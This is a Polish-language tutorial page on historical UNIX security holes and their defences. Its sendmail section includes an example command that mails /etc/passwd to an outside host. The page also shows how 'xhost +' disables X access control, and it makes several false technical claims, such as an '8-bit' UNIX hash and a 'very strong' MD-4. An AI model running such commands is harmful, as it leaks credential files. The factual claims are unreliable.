Luki w systemach UNIX

Ta strona szczegółowo opisuje wrażliwe punkty zabezpieczeń systemu UNIX. Po przeczytaniu będą zrozumiałe następujące zagadnienia:

	W jaki sposób UNIX przechowuje hasła?
	Jak hakerzy łamią hasła?
	Brutalny atak na system UNIX.
	Zabezpieczniae plików i katalogów w systemie UNIX.
	Wrażliwe punkty w systemie UNIX: plik /etc/hosts.equiv wielokrotne kopie pliku $HOME/.rhosts błąd w opcji Debug programu SendMail błąd odsyłania wiadomości w programie Sendmail problem przepełnienia bufora przez demon fingerd
	Szyfrowanie plików UNIX-owych.
	Filtrowanie portów.
	System X-Windows oraz problemy z bezpieczeństwem.

Zbiór linków:

	Przewodnik po systemie UNIX: http://www.nacse.org/demos/coping-with-unix/download.html
	Wskazówki dotyczące konfigurowania UNIX-a: http://info.cet.org/pub/tech_tips/UNIX_configuration_guidelines
	Ścieżki: http://cs-www.bu.edu/help/unix/understanding_pathnames.html
	Bezpieczństwo systemu X Windows: http://www.beckman.uiuc.edu/groups/biss/VirtualLibrary/xsecurity.html
	Świat tajemny UNIX-a: http://www.urgu.com

Wprowadzenie do systemu UNIX

Firmy, instytucje oświatowe i agencje rządowe na całym świecie używają systemu operacyjnego UNIX. System ten został utworzony przez firmę AT&T i stanowi podstawę Internetu i serwerów sieci WWW już od lat sześćdziesiątych. Różnych wersji systemu UNIX jest prawie tyle, co różnych serwerów UNIX-owych. Najnowsze implementacje są oparte na systemie BSD (Berkeley Standard Distribution).

W tym rozdziale najpierw zostaną opisane często używane polecenia służące do administrowania serwerem UNIX-owym. Zostaną również omówione demony systemu i niektóre dobrze znane błędy w zabezpieczeniach systemu UNIX. Następnie w skrócie zostanie wyjaśnione działanie systemu X-Windows, graficznego interfejsu użytkownika stosowanego przez większość systemów UNIX do komunikacji z użytkownikiem. Poznamy też niektóre niebezpieczeństwa związane z używaniem systemu X-Windows w sieci.

W jaki sposób system UNIX przechowuje hasła?

Każdy system operacyjny przechowuje pewnego rodzaju bazę danych z hasłami, która jest stosowana do identyfikowania użytkowników podczas logowania. Baza danych systemu UNIX jest zawarta w pliku /etc/passwd znajdującym się na serwerze. Jednakże ta baza danych nie przechowuje tak naprawdę haseł, ani nawet haseł zaszyfrowanych, które można potem odszyfrować. Przechowuje jednokierunkową funkcję haszującą hasła użytkowników.

Jak wiadomo ze strony Szyfrowanie jednokierunkowa funkcja haszującą przetwarza dane wejściowe i zapisuje je w postaci unikatowej wartości. W systemie operacyjnym UNIX hasło podane przez użytkownika jest przedstawiane w postaci ciągu bajtów, a następnie za pomocą algorytmu jednokierunkowej funkcji haszującej jest przekształcane w unikatową wartość, jak pokazano na rysunku 1.

Rys. 1. System operacyjny przekształca hasło w wartość zhaszowaną

Gdy użytkownik próbuje zalogować się do serwera UNIX-owego, wówczas jego terminal przesyła do serwera żądanie zalogowania w postaci zwykłego tekstu. Serwer z kolei przeprowadza na tym tekście takie same przekształcenia Jak w wypadku generowania pierwszej wartości funkcji haszującej do bazy danych z hasłami. Innymi słowy, serwer przeprowadza na podanym haśle operację jednokierunkowego haszowania. Następnie serwer porównuje wygenerowaną zhaszowaną wartość z wartością znajdującą się w bazie danych haseł. Jeżeli obie wartości są identyczne, to serwer loguje użytkownika do systemu. Na rysunku 2 przedstawiono sposób transmisji tekstu hasła i proces przekształcania go przez serwer.

Rys. 2. Transmisja i konwersja haseł w systemie UNIX

W przeciwieństwie do systemu Windows NT i NetWare, które szyfrują hasło jeszcze przed przesłaniem go do serwera, system UNIX przesyła nic zaszyfrowane hasło narażając je na wychwycenie przez osoby postronne. Co gorsza, w przeciwieństwie do systemu Windows NT, który korzysta z Message Digest-4 (MD-4), bardzo silnego algorytmu szyfrowania, system UNIX korzysta z 8-bitowej funkcji haszującej, dającej w wyniku łatwiejszy do złamania zestaw haseł. Ze względu na to, że plik haseł jest dostępny domyślnie wszystkim użytkownikom, a nie ukryty, jak w wypadku systemów Windows NT i NetWare, system UNIX jest znacznie bardziej narażony na atak brutalny albo atak słownikowy, opisane w dalszej części strony.

Jak hakerzy łamią hasła?

Aby zdobyć plik z hasłami z sieci UNlX-owej, haker musi mieć dostęp do tej sieci albo przynajmniej mieć możliwość wykorzystania usług sieciowych (na przykład za pomocą usługi sendmail opisanej w dalszej części rozdziału) do zdobycia dostępu do pliku /etc/passwd. Po zdobyciu pliku z hasłami haker potrzebuje jeszcze 8-bitowej funkcji szyfrującej używanej w systemie UNIX. Następnie może on przeprowadzić na pliku z hasłami albo atak brutalny, albo atak słownikowy. Obie metody zostaną opisane w następnych podrozdziałach.

Ponieważ plik /etc/passwd jest dostępny wszystkim użytkownikom na serwerze UNIX, haker może zdobyć ten plik dysponując minimalnymi prawami dostępu do serwera albo nawet bez prawa dostępu (za pomocą metody bounce flaw). Niezbędne jest zatem „utajnianie" haseł i używanie programów zwiększających ich bezpieczeństwo.

Brutalny atak na system UNIX

Gdy haker atakuje sieć UNIX-ową, wówczas jego pierwszym krokiem jest próba zgadnięcia jakiegoś hasła niższego poziomu. W przeciwieństwie do systemów Windows NT i NetWare, system UNIX nie blokuje użytkownika po podaniu kilku błędnych haseł. Przez taką pobłażliwość systemu haker może przeprowadzać próby włamania się, nie dysponując dostępem do serwera. Haker przy próbie złamania statycznej bazy danych systemu UNIX może posłużyć się odpowiednim programem. Niektóre darmowe programy mogą złamać 16-znakowe hasło w tak krótkim czasie, jak 10 dni (w zależności od szybkości połączenia). Po uzyskaniu przez hakera hasła niższego poziomu, haker może się za jego pomocą zalogować do serwera i zdobyć kopię pliku /etc/passwd.

Po skopiowaniu przez hakera pliku /etc/passwd, może on zastosować metodę ataku brutalnego i zgadywać hasła aż do momentu trafienia na hasło akceptowane przez sieć. Proces zgadywania haseł może być zautomatyzowany za pomocą programu podającego je w sposób ciągły. Jeden z takich programów jest szeroko dostępny w Internecie. Program generuje hasła takie, jak aa, ab, ac itd. aż do wyczerpania wszystkich możliwości. Haker może przypadkiem trafić na właściwe hasło.

Najlepszym zabezpieczeniem przed atakiem brutalnym jest utajnianie pliku z hasłami. Haker nie może wówczas zdobyć aktualnych haseł, a tylko leksemy do innego pliku. Haker nie może przeprowadzić ataku brutalnego, gdyż nie jest w stanie porównać swoich rezultatów funkcji szyfrującej z zaszyfrowanymi wartościami w pliku.

Obrona przed atakiem słownikowym

Atak brutalny wymaga długotrwałego dostępu do pliku haseł sieci UNlX-owej w przeciwieństwie do ataku słownikowego, który może być przeprowadzony zarówno na pliku z hasłami w sieci, jak i na kopii tego pliku nie umieszczonej w sieci.

Ogólnie, w wypadku ataku słownikowego haker przesyła wyrazy ze słownika do monitu logowania (przy próbie złamania hasła w sieci). Może też pobierać wyrazy ze słownika, przekształcać je za pomocą tego samego algorytmu szyfrowania, co używany w sieci UNlX-owej, i sprawdzać, czy otrzymana wartość jest identyczna z wartością w pliku z hasłami (w wypadku dysponowania kopią tego pliku). Jeżeli zaszyfrowane wartości są takie same, to oznacza to, że hasło ze słownika jest hasłem danego użytkownika.

Najlepszą obroną przed atakami słownikowymi jest zmuszenie użytkowników do regularnego zmieniania swoich haseł. Ważne jest również uruchamianie co jakiś czas programu SATAN (Security Administrator Tool for Analyzing Networks), albo innego programu do analizy sieci i sprawdzania haseł. Ważne jest również instruowanie użytkowników, aby podawali hasła minimum 8-znakowe, zawierające cyfry, symbole i litery.

Stosowanie lepszych haseł

W sieci W W W można zdobyć kilka darmowych programów, które po zainstalowaniu w sieci UNlX-owej zmuszają użytkowników do przestrzegania pewnych ważnych reguł tworzenia haseł. Kilka z tych darmowych programów można znaleźć na stronie WWW pod adresem http://www.jamsa.com.

Zabezpieczenia plików i katalogów w systemie UNIX

Przy tworzeniu konta w sieci UNlX-owej system operacyjny przypisuje temu kontu specjalny numer użytkownika i numer grupy. Numery te służą do identyfikacji użytkowników. System powinien rozpoznawać dwa konta o innych nazwach użytkownika, ale tych samych numerach użytkownika, jako te same konta. Ponadto system UNIX używa numerów użytkownika i numeru grupy do ustalania praw dostępu tego użytkownika do plików i katalogów. Dzięki temu rozpoznawanie tych praw może się odbywać bez zbędnych dodatkowych informacji.

W przeciwieństwie do systemów NetWare i Windows NT, system UNIX obsługuje trzy rodzaje uprawnień do plików: read, write i execute. Zostały one opisane w tabeli 1

Tabela 1. Trzy różne uprawnienia do plików i katalogów

W tabeli 2 zostało opisane znaczenie uprawnień z tabeli 1 w wypadku zastosowania ich do katalogów.

Tabela 2. Rodzaje uprawnień do katalogów

W systemie UNIX użytkownicy są pogrupowani w trzy klasy: User (właściciel pliku lub katalogu), Group (użytkownicy tej samej grupy co właściciel pliku) oraz Other (wszyscy pozostali użytkownicy). Można każdej z tych klas użytkowników nadać inne uprawnienia.

Aby zobaczyć prawa dostępu do plików lub katalogów, należy użyć polecenia ls -l. Na przykład następujące polecenie wyświetla zawartość bieżącego katalogu i uprawnienia do plików będących tą zawartością:

$ ls -l <Enter>

 drwxrwxrwx 1 bin    lklander sys 12345 Mar 10 01:30 bin

  -rwxr-xr--   1 guest lklander users 256 Mar 20 02:25 happy

W powyższym przykładzie katalog bieżący zawiera katalog podrzędny o nazwie bin oraz plik o nazwie happy. Pierwsza kolumna spisu wyświetlanego po poleceniu ls -l wskazuje na typ pliku i uprawnienia. W pierwszym wierszu pole drwxrwxrwx oznacza, że pozycja dotyczy katalogu (wskazuje na to litera d). Pozostała część tego pola oznacza prawa dostępu do katalogu. Jest ona podzielona w formacie [[user][group][other]. Oznaczenia uprawnień są następujące: r to prawo odczytu (read), w to prawo zapisu (write) oraz x — prawo uruchamiania (execute). W tym wypadku wszystkie grupy mają wszystkie trzy uprawnienia do katalogu bin.

W następnym wierszu pierwszym znakiem jest minus (-). Oznacza to, że obiekt happy jest plikiem. Gdyby to był plik urządzenia, to minus zostałby zastąpiony literą c. Następne trzy grupy znaków pokazują, że właściciel pliku ma wszystkie uprawnienia, użytkownicy z tej samej grupy, co właściciel, mają prawo do odczytu i uruchamiania, ale nie do zapisu (bo zamiast litery w jest minus). Pozostali użytkownicy mają tylko prawo do odczytu (jak wskazuje r--).

W drugiej kolumnie jest wyświetlany numer (w obu wierszach jest to l) oznaczający liczbę kopii danego pliku w systemie. Trzecia kolumna oznacza nazwę właściciela pliku (lub katalogu). W czwartej kolumnie jest umieszczana nazwa użytkownika odpowiadająca właścicielowi pliku. Piąta kolumna, nie pokazywana w niektórych wersjach systemu, oznacza nazwę grupy właściciela. W szóstej kolumnie jest podany rozmiar pliku, a w siódmej — data ostatniej modyfikacji pliku. Ostatnia kolumna zawiera nazwy plików lub katalogów.

Zasadniczo należy ograniczyć prawa użytkowników do wszystkich plików, oprócz ich własnych, tworzonych w ich własnych katalogach. Użytkownik będzie bardzo rzadko potrzebował innych uprawnień niż prawo do uruchamiania (execute) plików binarnych i innych praw niż prawo do odczytu pozostałych plików. Co jakiś czas należy sprawdzać system uprawnień na serwerze.

Wrażliwe punkty systemu UNIX

System UNIX, podobnie jak Windows NT i NetWare, ma wiele powszechnie znanych luk w zabezpieczeniach. System UNIX jest w szerokim użyciu znacznie dłużej niż pozostałe dwa systemy. Poza tym liczba komputerów w Internecie działających w systemie UNIX jest znacznie większa niż liczba komputerów działających w systemach Windows NT i NetWare razem. Dlatego też liczba poznanych błędów systemu UNIX jest większa. W usunięciu większości, jeśli nie wszystkich, błędów w zabezpieczeniach pomocny będzie program SATAN.

Haker włamujący się do systemu przeważnie ma jakiś konkretny cel. Można wyróżnić 7 poziomów dostępu, które mogą być zdobyte przez hakera. Poniżej zostały wymienione najczęstsze cele hakerów w porządku malejącym według znaczenia.

1. Hasło konta root. Hasło do tego konta jest najważniejszym celem hakera. Pozwala mu ono na normalne administrowanie systemem. Jedyną różnicą między administratorem a hakerem znającym hasło konta root jest to, że administrator ma fizyczny dostęp do sieci,

2. Dostęp do konta root. Haker ma dostęp do całego systemu, ale nie może się logować, gdyż nie zna hasła. Dlatego też może nie być w stanie powrócić do systemu.

3. Hasło do konta użytkownika X. Haker zna hasło ustalonego użytkownika umożliwiające hakerowi dostęp do systemu.

4. Dostęp do konta użytkownika X. Haker ma dostęp do konta, ale może nie móc ponownie załogować się do systemu, gdyż nie zna hasła do tego konta.

5. Hasło nieokreślonego użytkownika. Haker zna hasło jakiegoś losowego użytkownika, ale nie zna jego nazwy ani uprawnień.

6. Dostęp do konta nieokreślonego użytkownika. Haker ma dostęp do konta losowego użytkownika, ale nie zna hasła do tego konta.

7. Atak typu odmowa usługi. Nawet bez pełnego dostępu do konta wielu hakerów,  może usuwać pliki, zaburzać pracę systemu i powodować inne szkody 

Usuwanie pliku /etc/hosts.equiv

Niezależnie od tego, czy użytkownicy sieci mogą korzystać ze zdalnych poleceń BSD, należy rozważyć usunięcie pliku /etc/hosts.equiv. Gdy uruchamia się w systemie któreś ze zdalnych poleceń BSD, wówczas plik hosts.equiv jest używany do określona komputerów będących w relacji ufności z systemem. Użytkownicy na tych komputerach mogą używać programów, takich jak rlogin, w celu zalogowania się na nasz komputer bez potrzeby podawania hasła. Jeżeli zdalne polecenia BSD są wyłączone albo nie chcemy jawnie określać relacji ufności z innymi komputerami to plik /etc/hosts. equiv nie będzie potrzebny i należy go usunąć. Po usunięciu tego pliku nie spowoduje on już żadnych problemów nawet w wypadku ponownego włączenia zdalnych poleceń BSD.

Jedną z największych wad pliku hosts.equiv jest to, że w większości systemów UNIX plik ten pozwala komukolwiek, kto jest użytkownikiem innego systemu (na przykład Windows 95), na zalogowanie się za pomocą polecenia rlogin na wszystkie konta oprócz konta root.

Jeżeli konfiguracja twojego serwera nie pozwala na usunięcie pliku hosts.equiv to należy zastosować się do poniższych zasad, aby zminimalizować ryzyko korzystania z tego pliku:

	Upewnić się, że w pliku hosts.equiv jest uwzględniona niewielka liczba komputerów zaufanych.
	Nigdy nie należy wpisywać w pliku hosts.equiv wierszy rozpoczynających się od znaków + lub ++. W większości wersji UNIX znaki + lub ++ powodują przyznanie każdemu użytkownikowi logującemu się za pomocą polecenia rlogin dostępu do sieci bez potrzeby podawania hasła.
	Do łatwego zarządzania usługą NIS (Network łnformation Service) należy używać programu netgroups.
	Relacje ufności należy nawiązywać tylko z komputerami w tej samej domenie albo bezpośrednio przez nas administrowanymi.
	Upewnić się, że wszystkie zaufane komputery mają poprawne nazwy postaci na przykład: nazwa_komputera.nazwą_domeny.au.
	Upewnić się, że w pliku hosts.equiv nie występują znaki ! i #. W tym pliku niemożliwe jest stosowanie komentarzy.
	Upewnić się, że żaden ze znaków w pliku nie jest minusem (-).
	Upewnić się, że uprawnienia do tego pliku są ustawione na tryb 600.
	Upewnić się, że właścicielem pliku jest użytkownik root.
	Po każdym zainstalowaniu dodatkowego składnika systemu należy sprawdzić plik hosts.equiv.

Zabezpieczenie przed wielokrotnymi kopiami pliku $HOME/. rhosts

Plik .rhosts zawiera spis zdalnych komputerów akceptowanych przez sieć, podobny do spisu z pliku hosts.equiv. Niestety plik .rhosts może być utworzony przez każdego użytkownika, co czyni ten plik poważnym zagrożeniem. Można zminimalizować ryzyko stosując się do poniższych zasad.

	Upewnić się, że żaden z użytkowników nie ma pliku .rhosts w swoim katalogu głównym. Czasami ten plik jest potrzebny, więc należy samemu zdecydować o pozostawieniu go, rozpatrując każdy wypadekek osobno. Na przykład plik ten bardzo się przydaje przy automatycznym tworzeniu kopii zapasowych poprzez sieć.
	Do sprawdzania, rejestrowania zawartości i usuwania plików $HOME/.rhosts należy używać polecenia cron. Użytkownicy powinni być informowani o okresowym przeprowadzaniu tego typu kontroli i o ewentualnych karach za niestosowanie się do ustalonych zasad.

Błąd w opcji Debug programu sendmail

Ostatnio wykrytą luką w programie sendmail jest błąd w opcji Debug (włączanej poprzez podanie parametru -d). Wszyscy użytkownicy muszą mieć możliwość uruchamiania programu sendmail przy wysyłaniu poczty. Haker, który ma dostęp do sieci, może ustawić w opcji Debug bardzo dużą wartość. Spowoduje to zapełnienie bufora stosu (przestrzeni udostępnianej przez system operacyjny do uruchamiania programów), co może wywołać w efekcie wykonanie nieprzewidzianych poleceń. W najnowszej wersji programu sendmail wartość tej opcji jest sprawdzana. Program sendmail nie zostanie uruchomiony, gdy wartość ta przekroczy pewien zakres.

Błąd odsyłania wiadomości w programie sendmail

Błąd odsyłania wiadomości w programie sendmail był przez pewien czas błędem najczęściej wykorzystywanym przez hakerów. Polega on na tym, że haker wysyła wiadomość pocztową do nie istniejącego użytkownika, a demon odsyła ją z powrotem, ale już z dołączonym plikiem zażądanym przez hakera. Na przykład haker może podać następujące polecenie:

/bin/mail lklander@hackerp.com < /etc/passwd <Enter>

Gdy program sendmail odkryje, że użytkownik lklander nie istnieje, wówczas odeśle do nadawcy jego wiadomość z komunikatem o błędzie. Niestety sendmail przesyła hakerowi również dołączony do wiadomości plik z hasłami systemu.

Problem przepełniania bufora przez demon fingerd

 Jednym z błędów systemu UNIX wykrytych przez  program Internet WORM 88' był problem przepełniania bufora przez demon fingerd. Gdy informacja podawana przez użytkownika była dłuższa niż 512 bajtów, wówczas demon fingerd przepełniał bufor stosu, pozwalając hakerowi na uruchomienie nowej powłoki i wywołanie w niej poleceń.

Szyfrowanie plików UNIX-owych

Użytkownicy systemu UNIX powinni mieć nawyk szyfrowania ważnych plików za każdym razem, gdy umieszczają je w publicznym miejscu lub przesyłają przez publiczne systemy komunikacyjne. Szyfrowanie nie jest niezawodne, ale i tak lepsze niż tekst nie zaszyfrowany. UNlX-owe narzędzie crypt jest najsłabszym zabezpieczeniem, gdyż haker może odszyfrować informację za pomocą znanych technik. Bezpieczniejszym narzędziem jest program des szyfrujący pliki za pomocą algorytmu DES (Data Encryption Standard), o którym można przeczytać na stronie Szyfrowanie. Nie jest znany wypadek ważnych danych. Dostępne jest również nowe narzędzie UNlX-owe pod nazwą PGP 2.2 (używające algorytmu RSA), ale należy zwrócić uwagę na zagadnienia licencji na używanie tego programu.

Metody bezpiecznego programowania w systemie UNIX

Jak wiadomo, sieć UNIX-owa jest narażona na poważne niebezpieczeństwo ze strony hakerów. Można się zabezpieczyć przed wieloma znanymi sposobami ataków i zredukować niebezpieczeństwo włamania się do sieci stosując się do następujących zasad:

	nigdy nie należy tworzyć skryptu powłoki z ustawionym bitem UID; istnieją dobrze znane techniki, za pomocą których można uzyskać dostęp do programu powłoki działającego jako użytkownik root;
	przy każdym wywołaniu polecenia system lub popen należy podawać pełną ścieżkę dostępu do pliku;
	gdy nie ma ważnego powodu, dla którego użytkownicy powinni mieć prawo odczytu do plików wykonywalnych, wówczas należy za pomocą polecenia chmod ustawić uprawnienia do pliku typu setuid na tryb 4711, a w wypadku innych programów na tryb 711;

Filtrowanie portów

Wielu hakerów próbuje atakować system poprzez moduł mapowania portów i znane porty protokołowe. Aby uchronić się przed takimi atakami, należy upewnić się, że usługi udostępniane poprzez te porty komputerom spoza domeny są zatrzymywane w ruterze. W szczególności jeżeli poza domeną są niepotrzebne usługi podane w tabeli 3, to należy je wyłączać w ruterze.

Tabela 3. Porty, które należy wyłączać w ruterze

Uwaga: Każda usługa UDP, która odpowiada na przychodzące pakiety, może być obiektem ataków włamywaczy.

System X-Windows

Dostępny za darmo system X-Windows (albo po prostu X) jest graficznym interfejsem użytkownika, który daje użytkownikowi możliwość operowania wieloma skalowalnymi oknami. System X-Windows jest wysokiej jakości, niezależnym platformowo systemem graficznym działającym w UNlX-owym środowisku klient-serwer. System X-Windows jest oparty na protokole sieciowym, a nie na procedurach lokalnych. Pozwala mu to obsługiwać w identyczny sposób zarówno lokalne, jak i sieciowe połączenia, czyniąc sieć niewidoczną zarówno z punktu widzenia użytkownika, jak i z punktu widzenia aplikacji.

Informacja potrzebna do utworzenia nowego okna jest minimalna. W rzeczywistości serwer X wymaga tylko danych o rozmiarze okna, kolorze tła, stylu czcionki i jej wielkości. Gdy serwer X otrzymuje te informacje, wówczas na ich podstawie udostępnia komputerowi-klientowi okno o odpowiednich cechach. Ilość informacji, która musi być przesłana przez sieć, jest mała w porównaniu do na przykład bitmapowego opisu tego okna. Sprawia to, że system X-Windows jest wydajnym systemem obsługi okien na odległość, jak również użytecznym systemem operacyjnym dla komputerów UNIX-owych, które są zazwyczaj słabsze i mają mniejszą moc obliczeniową niż komputery typu PC.

Jak hakerzy wyszukują działające terminale X-Windows?

Jednym z ważniejszych środków ochrony przed włamaniem jest polecenie xhost zarządzające dostępem do systemu X-Windows. Na większości komputerów X-Windows w sieci administrator ustawia wartość xhost odpowiadającą wyłącznie serwerowi X. Wówczas tylko serwer X może wysyłać i odbierać z tego komputera okna X--Windows oraz dołączone informacje. Jednakże czasem administrator wyłącza taką kontrolę dostępu albo robi to przypadkiem sam użytkownik. Komputer X-Windows z wyłączoną kontrolą dostępu nazywa się otwartym terminalem X. Polecenie xhost może być użyte zarówno na serwerze X-Windows, jak i na terminalu X-Windows. Wyłączenie kontroli dostępu na komputerze X-Windows za pomocą polecenia xhost odbywa się w następujący sposób:

$ xhost + <Enter>

Poprzedni przykład nakazuje komputerowi X-Windows, aby pozwolił połączyć się z nim każdemu zaufanemu komputerowi. Jeżeli to polecenie zostanie wydane na serwerze, to kontrola dostępu do serwera zostanie zniesiona i wówczas dowolny komputer (nie tylko zaufany) będzie mógł się z nim połączyć. Polecenia xhosts można również użyć do zniesienia kontroli dostępu do komputera X-Windows wobec tylko jednego komputera. Aby to uczynić, należy użyć następującego polecenia:

$ xhost + xxx.xxx.xxx.xxx <Enter>

W powyższym przykładzie xxx. xxx. xxx. xxx oznacza adres w notacji dziesiętnej z kropkami komputera, który może się łączyć z naszym komputerem. Aby z powrotem włączyć kontrolę dostępu na serwerze X-Windows, należy wydać następujące polecenie:

$ xhost - <Enter>

Po podaniu powyższego polecenia żaden komputer, z wyjątkiem lokalnego, nie może połączyć się z systemem X-Windows. Jeżeli więc serwer X-Windows jest zawsze uruchamiany z poleceniem xhost -, to jest zabezpieczony przed programami wyszukującymi w sieci nie zabezpieczone terminale X i przyłączającymi się do nich.

Problem lokalnego terminala X-Windows

Uruchamianie terminala X-Windows z włączoną kontrolą dostępu za pomocą polecenia xhost może ustrzec przed atakami hakera poprzez port 6000. Jednakże haker może w inny sposób obejść zabezpieczenia uzyskane dzięki poleceniu xhost. Wystarczy, że będzie w stanie załogować się na nasz komputer. Wówczas może połączyć się z systemem X-Windows i wykraść zawartość okien.

Haker musi mieć konto w systemie i możliwość zalogowania się na komputer, przy którym pracuje konkretny użytkownik. W sieci składającej się z wielu komputerów żaden z terminali X nie jest bezpieczny przed ludźmi mającymi dostęp do sieci. Możliwość uruchomienia procesu na jakimś komputerze jest równoznaczna z możliwością dostania się do wszystkich okien X-Windows na tym komputerze.

Techniki wychwytywania okien w systemie X-Windows

Wielu hakerów próbuje wychwycić okna w momencie, gdy serwer X przesyła je do klienta. Istnieje kilka powszechnie dostępnych, darmowych programów, których hakerzy używają do przechwytywania okien X-Windows podczas transmisji.

Jeżeli haker ma dostęp do sieci i odpowiednie narzędzia, to może obserwować tabelę procesów na serwerze X-Windows i przechwytywać oraz kopiować wszystkie transmisje, które wybierze z tabeli procesów.

Techniki rejestrowania okien w systemie X-Windows

Jeżeli haker może się przyłączyć do systemu X-Windows, to może on rejestrować informacje o naciśniętych klawiszach, które są przesyłane do serwera X. Istnieje kilka powszechnie dostępnych programów używanych przez hakerów do przechwytywania takich informacji. Włamywacz może obserwować nasze czynności i przesyłać informacje o naciśniętych przez nas klawiszach do innych procesów, tak jakbyśmy to my pisali na jego klawiaturze.

Opcja Secure Keyboard w oknie terminala X-Windows

Często się zdarza, że użytkownicy wpisują hasła, informacje o plikach i inne dane w oknie terminala X-Windows (xterm) na swoim komputerze. Jest bardzo ważne, aby mieli oni pełną kontrolę nad tym, które procesy mogą korzystać z okna xterm. Użytkownicy mogą decydować, czy okno xterm ma przesyłać dane na temat zdarzeń (na przykład informacje o naciśniętych klawiszach) do serwera X-Windows. Domyślną wartością jest False. Oznacza to, że okno xterm odrzuca wszystkie żądania Send-Event i nie przesyła do serwera X żadnych informacji o zdarzeniach. Ustawienie to można zmienić w pliku .Xdefaults za pomocą standardowej definicji zasobów. Spowoduje to, że okno xterm będzie odpowiadało na żądania SendEvent serwera X. Należy wpisać następującą wartość:

xterm*allowSendEvents     True

Można też wybrać polecenie Allow Sendevents z menu Xterm Main Options. Jednakże pozwalanie, aby okno xterm mogło przesyłać dane o zdarzeniach, nie jest dobrym pomysłem. Należy tego unikać, jeżeli nie ma się ważnego powodu, aby to umożliwić.

Okno xterm korzysta ze specjalnego zabezpieczenia trzymającego inne funkcje X-Windows z dala od klawiatury terminala w momencie, gdy są na niej wpisywane ważne dane, hasła itp. Tej samej funkcji można użyć do zabezpieczenia wszystkich używanych okien przed hakerami próbującymi zdobyć dane o naciśniętych klawiszach. W systemie X-Windows to zabezpieczenie jest znane jako opcja Secure Keyboard. Aby ją włączyć, należy wybrać polecenie Secure Keyboard z menu Main Options. Jeżeli kolory na ekranie zostaną odwrócone negatywowo, to będzie to oznaczało, że klawiatura jest zabezpieczona. 

Z POWROTEM DO GÓRY STRONY